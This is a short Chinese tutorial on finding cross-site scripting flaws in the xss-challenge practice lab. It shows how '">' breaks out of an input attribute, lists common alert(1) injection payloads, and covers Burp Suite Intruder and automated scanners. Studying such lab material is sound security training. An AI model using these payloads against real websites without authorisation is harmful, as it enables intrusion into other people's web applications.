xss漏洞挖掘
以xss-challenge第二关为例
输入123
查看网页源代码
发现value值原样返回
手动挖掘
此处发现尖括号和双引号闭合完整,因此可以直接使用<script>alert(/xss/)</script>
测试
发现提交过后标签内容被双引号闭合进去了
因此此处需要将标签脱离出来,观察可以发现使用“>即可将input标签闭合,随后写进去的<script>
标签内容就可以被实现了
"><script>alert(/xss/)</script>
当然此处可以使用hackbar,因为hackbar有编解码功能,有些题目会需要编码绕过
如果有些过滤符号的,即可考虑使用伪协议绕过,详情可以参考xsschallenge后续关卡
常见的手工文本如下
<script>alert(1)</script>
"><script>alert(1)</script>
<img/src=@ alert(1)/>
"><img/src=@ alert(1)/>
'alert(1)x='
"alert(1)x="
javascript:alert(1)//
";alert(1)//
</script><script>alert(1)//
alert(1)//
工具
也可使用bp等相关工具
bp需要在这里先安装xss validator
bp抓包查看
发送给intruder然后标记keyword的值
注意要选择如图payload
相应包中,只要script标签是独立出来的就是成功的执行
正常来说,它应该会把成功的打勾,这里不知道为啥没有
自动
有诸多工具
awvs
APPscan
burp
xsser
OWASP Xenotix
g-N8IUvxlo-1700483007810)]